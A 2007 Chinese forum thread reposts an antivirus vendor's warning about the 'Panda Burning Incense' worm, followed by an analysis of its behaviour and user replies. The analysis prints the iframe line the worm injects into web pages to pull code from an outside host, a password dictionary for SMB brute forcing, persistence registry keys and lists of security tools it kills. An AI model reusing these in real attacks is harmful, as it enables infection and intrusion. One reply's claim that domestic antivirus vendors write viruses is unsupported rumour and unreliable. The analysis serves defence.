标题:
揭秘“熊猫烧香”肆虐内幕 已有千余家企业网络遭攻击
[打印本页]
作者:
呵气
时间:
2007-1-23 16:09
标题:
揭秘“熊猫烧香”肆虐内幕 已有千余家企业网络遭攻击
揭秘“熊猫烧香”肆虐内幕 已有千余家企业网络遭攻击
瑞星全球反病毒监测网向企业局域网发布警告,目前“尼姆亚(也称熊猫烧香)”病毒的攻击重点正在转向企业局域网和网站,广大企业和网站应提高警惕紧密防范。瑞星反病毒专家介绍说,该病毒会在中毒电
脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染,上传网页到网站后,就会导致用户浏览这些网站时也被病毒感染。
据悉,目前多家著名网站已经遭到此类攻击,而相继被植入病毒。由于这些网站的浏览量非常大,致使此次“熊猫烧香”病毒的感染范围非常广,中毒企业和政府机构已经超过千家,其中不乏金融、税务、能源等关系到国计民生的重要单位。
瑞星反病毒专家介绍说,“熊猫烧香”其实是“尼姆亚”病毒的新变种,最早出现在2006年的11月,到目前为止已经有数十个不同变种,在此期间瑞星已经发布针对该病毒的专杀工具,今天该工具已经升级,用户可以去瑞星网站(http://it.rising.com.cn/Channels/Service/index.shtml)免费下载使用。
除了通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以感染几千台计算机,严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。
那么,用户应该如何防范“熊猫烧香”病毒的攻击?
专家建议,第一,安装杀毒软件和瑞星卡卡3.1,并在上网时打开网页实时监控。由于现在海底光缆中断,很多国外杀毒软件难以升级,瑞星杀毒软件免费为用户提供一个月服务,可以登陆:http://www.rising.com.cn 免费下载并使用。用户还可以通过瑞星在线专家门诊:http://help.rising.com.cn取得帮助。
第二,网站管理员应该更改机器密码,以防止病毒通过局域网传播。
第三,QQ、UC的漏洞已经被该病毒利用,用户应该去他们的官方网站打好最新补丁。
第四,该病毒会利用IE浏览器的漏洞进行攻击,因此用户应该给IE打好所有的补丁。如果必要的话,用户可以暂时换用Firefox、Opera等比较安全的浏览器。
这是一个传染型的DownLoad 使用Delphi编写
该病毒的主要行为:
一.传播
1.本地磁盘感染
病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行
文件遍历感染注:不感染文件大小超过10485760字节以
上的.
(病毒将不感染如下目录的文件):
Microsoft Frontpage
Movie Maker
MSN Gamin Zone
Common Files
Windows NT
Recycled
System Volume Information
Documents and Settings
....
(病毒将不感染文件名如下的文件):
setup.exe
NTDETECT.COM
病毒将使用两类感染方式应对不同后缀的文件名进行感染
1.二进制可执行文件(后缀后为:EXE,SCR,PIF,COM)
将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.
2.脚本类(后缀名为:htm,html,asp,php,jsp,aspx)
在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):
<iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
在感染时会删除这些磁盘上的后缀名为.GHO
2.生成autorun.inf
病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成
setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联
使病毒在用户点击被感染磁盘时能被自动运行.
3.局域网传播
病毒生成随机个局域网传播线程实现如下的传播方式:
当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典
进行联接.(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务
启动激活病毒.
被尝试猜测密码的账户号为:
Administrator
Guest
admin
Root
用来进行密码尝试的字典为:
1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
mein
12345678
12345
admin
5201314
qq520
1234567
123456789
654321
54321
000000
11111111
88888888
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
2002
2003
2600
alpha
111111
121212
123123
1234qwer
123abc
patrick
administrator
ator
root
fuckyou
fuck
test
test123
temp
temp123
asdf
qwer
yxcv
zxcv
home
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
二.修改操作系统的启动关联
病毒会将自己复制到%SYSTEM32%\DRIVERS\目录下文件名为:spcolsv.exe将以
1秒钟为周期不断设置如下键值:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
svcshare=%病毒文件路径%
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue=0
三.下载文件启动
病毒会以20分钟为周期尝试读取特定网站上的下载文件列表
如:http://wangma.9966.org/down.txt
并根据文件列表指定的文件下载,并启动这些程序.
四.与杀毒软件对抗
1.关闭包含以下字符串的窗口:
防火墙
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
超级兔子
优化大师
大师
木马清道夫
木馬清道夫
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警
IceSword
2.结束以下进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe
3.关闭并删除以下服务:
Schedule
sharedaccess
RsCCenter
RsRavMon
RsCCenter
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
注:
因为该病毒会感染系统的htm,html,asp,php,jsp,aspx等文件,并在其中加入有利用安全漏洞进行
病毒传播的链接.如果一台服务器被感染将大大增加病毒传播的范围.
作者:
surFan
时间:
2007-1-23 22:37
作者:
wxadqeszc
时间:
2007-1-23 23:33
作者:
chenggg
时间:
2007-1-23 23:40
损人不利己的变态!做什么病毒嘛!有这个工夫 不知道做点兼职赚他一笔!
作者:
xuyong
时间:
2007-1-24 08:58
做这种病毒想干吗呢!害我们装了杀毒软件还要不停的升级,系统不断地打补丁。心里不断得祈祷,不要中招了。。。
作者:
每天都在啊
时间:
2007-1-24 10:09
中了招也不用怕,瑞星都有了专杀了我都用它查过了我的安全。
作者:
gu_jin
时间:
2007-1-24 14:13
我前天刚中过,那场面真壮观,初了C盘全是熊猫图象。
作者:
行为负责
时间:
2007-1-25 10:39
楼上的那最后你是怎么搞定的啊?是不是下载的专杀啊?
作者:
带有侮辱
时间:
2007-1-26 11:43
专杀我早就下载了,就是已防不策啊还好我没有中招真是高兴啊。
作者:
gedede
时间:
2007-1-27 10:33
中毒的图标很可爱,不过中毒以后很恐怖的!
作者:
cbs429
时间:
2007-1-27 16:17
没中毒,不知道是什么感觉。
作者:
reqingwodexin
时间:
2007-1-28 12:29
我倒觉得还好啦,每个人的电脑免疫力不一样吧
作者:
戒的了你
时间:
2007-1-29 11:27
貌似没有哪个电脑能够百毒不侵吧
作者:
侵犯国家
时间:
2007-1-30 11:54
听说瑞星先检测到的熊猫烧香这个病毒的不知道是不是真的啊。
作者:
purlin
时间:
2007-1-30 13:52
这个病毒太牛了.
作者:
杀手在线
时间:
2007-1-30 21:05
原帖由
侵犯国家
于 2007-1-30 11:54 发表
听说瑞星先检测到的熊猫烧香这个病毒的不知道是不是真的啊。
呵呵,指不定就是他们的实验室自己秘密搞出来的呢,这不,销售量不就上去了?嘎嘎。
所谓的什么国产病毒,80%都是这几个国产杀毒的厂商们自己捣的鬼。为什么诺顿,卡巴这些杀不掉或没有第一时间预警,难道真的是他们的技术比瑞星、江民、甚至金山这种·还差?诺顿是微软的战略合作伙伴,可以深入到win系统内核去的,卡巴那更是在国外很牛的,最早的内核是俄罗斯的黑客高手们做的,其杀毒引擎要追根溯源的话,这些个国产的杀毒软件都是它的徒子徒孙、技术变种,瑞星更是直接买过卡巴的主创人员的代码的。所谓“杀毒软件要用国产的,因为国外的杀毒软件技术上强是强,但是杀国产病毒不行”这句话,流传甚广,其中的意味,嘿嘿,大家有没有想过?
作者:
guqimiao
时间:
2007-1-31 14:02
提示:
作者被禁止或删除 内容自动屏蔽
作者:
杀手在线
时间:
2007-1-31 14:19
我要是说,“卡巴的水平没有瑞星的牛”,估计业内人士都得笑。瑞星自己的技术总监(姓刘的那个)更不敢这么说。
那么,瑞星率先防杀住了熊猫烧香,而卡巴却没,这说明什么?一个技术上并不高明的产品却取得了比技术上更先进的产品更好的表现。这其中若是没有猫腻,鬼都不信啦。
作者:
ugwnwgrg
时间:
2007-1-31 17:57
只能说卡巴不关心我们中国的用户吧.不然的话怎么会搞成这样呢
作者:
杀手在线
时间:
2007-1-31 19:03
不不,绝不是卡巴斯基不关心中国用户,恰恰相反,中国病毒这么猖獗(嘿嘿,个中原因也颇为值得深思一下),市场这么大,没有哪个IT公司不垂涎这块市场的,这块市场还大都是正版用户(大多数人系统可能用盗版,但杀毒软件用盗版的可能不多,起码比系统要少得多啦)。所以没哪个大公司敢放弃中国市场的。
这只能说明一件事———国产杀毒软件对国内“特产”病毒有“特殊”的免疫力和查杀能力!
作者:
传播信息
时间:
2007-2-1 12:12
楼上说的对,国内的杀毒软件对国产的病毒那是不用说了,要是老外出的病毒那就要非劲了不过也不是吹的啊。
作者:
hesshanxi
时间:
2007-2-1 18:25
路遥知马力,日久见人心,我用的就是瑞星正版!
作者:
琼紫
时间:
2007-2-2 14:32
所幸没事。还是国产软件好用,突然也觉得很奇怪,怎么卡巴对这个事情漠不关心的啊?反而倒是有业外人士分析呢?
作者:
alick
时间:
2007-2-14 03:50
病毒
作者:
5833542
时间:
2007-2-14 06:07
已经抓住拉
作者:
hope250
时间:
2007-2-14 21:38
我有McAfee,我没事儿
作者:
白日夢
时间:
2007-2-16 16:45
之前我都中了這隻毒
最後要把所有盤還原.....
欢迎光临 世界之窗论坛 (http://bbs.theworld.cn/)
Powered by Discuz! 7.2
病毒
之前我都中了這隻毒